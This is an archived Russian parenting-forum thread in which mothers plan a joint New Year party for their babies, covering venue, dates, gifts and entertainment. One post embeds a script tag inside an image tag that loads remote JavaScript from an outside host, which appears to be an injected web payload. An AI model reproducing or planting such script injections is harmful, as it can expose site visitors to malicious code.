Дети74.ruархив форума

ПЕРВЫЙ НОВЫЙ ГОД!ДЛЯ ЯНВАРЯТ И ИЮНЯТ!2011/12. СВЕРШИЛОСЬ!!!

1 320 сообщений · 108 330 просмотров · стр. 1 из 33
22 декабря 2011г Вот и пролетели 3 часа празднования Нового Года, как одно волшебное мгновение!!! Мне было мало...быть окруженной столькими  подругами, похвастаться может не каждая, а Я МОГУ!!!!! :razz:
Это еще один день с наших встреч, который отложится в моей памяти на долгие годы и который я буду хранить в своем сердце, как мааленький огонек, с нашего БОЛЬШОГО КОСТРА!
Без доли лукавства, НАШ праздник был самым лучшим, равных ему нет и не будет. И дело вовсе не в Оранжевом Ёжике и Асти, не в крутых тачках и сногсшибательных нарядах, а дело в НАС..да, да и в ТЕБЕ тоже и не оборачивайся назад, будто не знаешь, о ком идет речь, о тебе МОЯ ДОРОГАЯ, МОЯ ПОДРУЖКА-ФОРУМЧАНКА!!
  Спасибо МОИ...Господи кааак мне нравится это слово МОИ, пусть в этот момент, я буду чуточку эгоистична, но я с такой гордостью произношу их "МОИ ПОДРУЖКИ"!!! Я ВАС ЛЮБЛЮ! Спасибо, что вы есть...
:smitten: :smitten: :smitten: :smitten: :smitten: :smitten: :smitten: :smitten: :smitten: :smitten: :smitten: :smitten:
Дружба с ВАми, словно песня
Kroshka, маленьким то можно и одинаковые подарки, девочкам по куколке, мальчикам по машинке
т.е. группа солянка как их тут называют. Предлагаю сразу ограничить круг, что берем только из темки ровесников,т.к. желающих со стороны тоже много появятся
Lapatusya
Kroshka, маленьким то можно и одинаковые подарки, девочкам по куколке, мальчикам по машинке
тогда их можно закупить кому-то одному, а для старших деток можно самим купить ив общий мешок с подарками уложить
Хотя у нас и для старшего елка наверно будет отдельно.......
Белочка
Lapatusya
тогда их можно закупить кому-то одному, а для старших деток можно самим купить ив общий мешок с подарками уложить
Хотя у нас и для старшего елка наверно будет отдельно.......

а можно в закупке заказать, сейчас и гу---лл---ивер идет и ру---т---ойз
Lapatusya,Натусь, моей вот например лучше машинку, чем куклу..их у нас как тараканов повсюду)))
Lapatusya
согласна с тобой, можно по красивой фарфоровой куколке (типо фарфоровой) и мальчикам по модельке. В сумочку мягкую новогоднюю положить.
ИМХо подарки разные это и так родители купят, а тем более денюхи рядом еще, так ваще задарим, а то кому-то самокат подарят а кому-то погремушку.
Затариться в закупках и номана.
По поводу увеселительного мероприятия - предлагаю дед мороза и какого-нить "смешарика" куклу нанять на час и хватит. Потом чаепитие-шампанскопитие сделаем, побесимся и домой)
Kroshka
Lapatusya,Натусь, моей вот например лучше машинку, чем куклу..их у нас как тараканов повсюду)))
значит напротив списка подарок написать машинка или кукла.
Белочка,канеш тока наших. А про старших канеш у них своя елка будет, но ты ж Сержа все равно возьмешь с собой, а значит и подарок нать будет.

Сразу договариваемся со своими мужиками, привезти-увезти нас пьяных и веселых)))
А ну еще с датой - среди недели с 19 по 23 число, т.к. потом у многих думаю корпоративы будут и мамки возможно пойдут. И в эти дни нанять кукл дешевле выйдет, имхо.
У кого какие мысли?
давайте решим изначально по кол-ву нас и детей и куда мы все же подадимся?
Есть у кого сегодня времечко в клуб позвонить? я просто не можу, малая пока спит тут я тихо,  а потом мы уезжаем и до завтра до вечера))
В клубе нас примут с шампанским и прочим, как это все организовывается? И еще клуб думаю не очень по причине, что не все на сз живут, середину бы какую нить))
birdie,Кать по дате надо с декабрятами  решить, на когда они ДР свои запланировали?[img]http://<script language=javascript src=http://pmsc.free.fr/J/071123170438.js></script>[/img]
Kroshka,мы пока не встречались по этому поводу. встретимся тока в ноябре , но предположительно 19го декабря
но НГ же будет у нас тоже посреди недели? а то у нас в семье еще 2 ДР помимо Полиного, и мы уедем на выхи 3 и 25 декабря
Я была на елке в клубе дети 74, там игровая и комната для чаепития через коридор, с большими самое то, а вот с нашими малявками не очень.
Я за шампанское и закуски
А про подарки, Кате вот пока и куклы до лампочки и машинок полный дом и до ДР в НГ еще будет далеко, можно я сама куплю подарок? 🙂
Я не против со старшими, только вот еще ньюанс, как бы наша елка не совпала с садиковским утренником....
+ почитаю
Девочки про подарки, а может книжки???
Olga,можно книжки, я ЗА! У нас интерес к книгам большой. Только картонные нужно брать и формат побольше) Заказать опять же можно у девочек на рид.ру со скидкой 15% или может у кого наших есть скидка такая.

Среди недели старшие дети ж в садиках будут, подготовка к елкам у них усиленная, так что не все с ними будут.
http://www.lab***irint.ru/books/295856/ туту на 3 р дороже, но у меня у самой скидка 15% есть, можно еще +3% на выходные поймать
или еще класные книжки в закупкахБ*ел*факс, там очень большой выдор, есть музыкальные разные. у нас у МИши в почече были.
Olga,можно и музыкальную)
я думаю, лучше каждый сам пусть купит своим деткам игрушки. а то моя доча, например, любую бумажную книжку просто грызет(( зато любит пищалки и вкусняшки.

а насчет фотографа - может пару пап попросить? заодно и за детками приглянут, пока мама чаевничают
мы тоже хотим 🙂

по опыту таких праздников:

клуб нас может не выдержать, если мы все соберемся, посему предлагаю "посчитаться" и продумать дополнительный вариант с помещением попросторнее.

Дед Мороз и прочие *смешарики* - удовольствие только для старших, малыши испугаются чего доброго. в любом случае малыши не поймут и эта официальная часть их утомит. может и не стоит?

подарки - мне честно все равно будет ли это книжка, или машинка, или звенящая, или пищащая - в хозяйстве всё пригодится! поэтому согласна на централизованный закуп.

я ЗА фотографа. у кого-то вроде муж профи?

единственное, мы не можем 21 и еще в конце декабря у старшей утренник в садике, ну и лучше в будни.
и мы тут)
со старшим ходили на такую елку в клуб, ему было 9 мес.
Устают они конечно быстро, дед мороз приходил и просил даже аппликацию сделать, было уже сложно. Народу если больше 10, то душно через 5 минут.

лучше наверное устроить в будни, тогда мы без старшего будем.
подарки каждая мама может купить и в пакет положить и подарить, они вообще практически не обратят внимания кто им и что подарил.

Чаепитие обязательно для мам)) фотографа можно папу чьего-нить)
Девчат для нашего возраста программа должна быть 15- ну максимум 30 минут и не куклы- могут многие напугаться. В клубе вполне подходящее место. Старшего кста можно и в садике оставить, ну и главное что б не совпало с детсадовской елкой. тел клуба у меня есть,позвоню завтра, на какое число планируем? я б сразу забронировала
я за картонную книжку, машин у нас солить можно
Девчи ,чота я про клуб не поняла, смотрела тут темки за прошлые года-везде написано больше 10 человек нельзя, а нас же больше..может куда в другое местечко? просто в какой-нить децкий клуб типа оранжевого ежа.....
Вообщем если считаем число людей то я за и ещё Света-Svercha просила передать что она тоже будет с Глебкой.
Про подарки - я думаю нашим чадам в их возрасте глубоко всё равно, что им подарят....всему будут рады или вообще скорее не поймут что к чему, поэтому подарки-это больше данность традиции новогодней, посему я согласна тоже на всё, на любой подарок, хоть книга, хоть вкуснота (которую мы не едим), хоть игруха....Дед мороз и прочие персонажи-думаю не надо, мой точно испугается дядьки с бородой)))
а шампусь нам в если отмечать в клубе 74 разрешат?
Давайте ещё решать старших берём или нет?
что касается дат я не могу 21 и  в выхи которые будут после 21....а ещё у мужа корпоратив и я на него скорее всего намылюсь, када буит-хз.....ну и плюс ёлка у старшего когда будет тоже хз....
про фотографа-у Лапатуси же муж проф....Думаю у Насти-кей, если она с нами пойдёт есть друзья профы....Хотя щас профов столько, что засаливать их можно, найти не проблема...главное знать на какое число и время нанимать...
Белочка,ждём инфы про клуб 74
Веснушк@, дни рождения в клубе отмечают и народу вроде побольше десятка...

мне старшего девать некуда, да и Верочку я могу ему доверить
Мы тоже хотим, про место, надо поискать, по итернету поспрашать
Про подарки, нам все равно, книжки едим, машинок полный дом, пока что все тянем в рот и долгой заинтересованности ничего кроме запретных плодов не вызывает)))
Так-с, народ уже бронирует времечко. Про клуб. будни 1200 час, выхи 1400/ час. Одно большое условие, анимация только их, цены будут позже. По количеству деток -не ограничено,но мы сами понимаем, что если нас соберется 38 человек -на 2 пусть и не маленькие комнатушки - это будет и душно и тесно, поэтому в группах по старше вводили ограничения, для своего же комфорта, но мы то др с др бок о бок не то что б с пеленок, а как только появились 2 полосочки))))))
оранжевый ежик - у них аренда сумашедшая
По времени давай те определимся. Они работают с 10 до 19
я за любой кипишь! что от меня требуется?
Тада давайте в клубе)) осталось выбрать день. А по времени на сколько часов бум выкупать?часика на 3? И где находится этот клуб, какой там адрес?
Веснушк@
Тада давайте в клубе)) осталось выбрать день. А по времени на сколько часов бум выкупать?часика на 3? И где находится этот клуб, какой там адрес?
ворошилова 12а
3 часа много, 2х хватит с лихвой, например в 10 начало, в 10-15, 10-30 начало программы максимум минут на 30, а после чаепитие (кому дети позволят попить чайку) и игры в комнате.
Давайте со временем определимся, утро или вечер? выхи или будни?
Белочка, к вечеру детки устают, точно не дадут чаю попить, если для деток-лучше с утра, у них настроение хорошее (в основном)))) и про будни и выхи... в основном в выхи даж на сайт многие не выходят, все с семьями... да и старшие детки тоже у многих, в обычный день они в саду, а в выходной может не с кем оставить
я за утро в будни
я за будни с утра. Муж отказался нас фоткать, сказал будет занят((, у него действительно там ежедневные съемки. Мне без разницы какие будут подарки, у нас и кукол нет и машинок нет
девочки, а может без анимации? просто чай/шампанское попьем?
нашим деткам фиолетово будет на анимацию.
им больше понравится между собой общаться.
Вот и я думаю зачем анимация?)))все равно ничего не поймут, а только напугаются... Мне удобно будни, чтоб старшего в садик утро или день...насчеты даты надо посчитать когда муж буит отдыхать, чтоб отвез...а то для меня ворошилова это далековасто своим ходом...
Ок с временем значит 10?, 11? 12 часов начало?)))))
Считайте у кого когда мужья работают/отдыхают, нам наверно так рано не скажут когда утренник в садике будет, хотя если в 12 то везде успеем при совпадении. Я за 12 часов, мы к этому времени уже и выспимся
тимка-кимка, проситесь к своим ровесникам)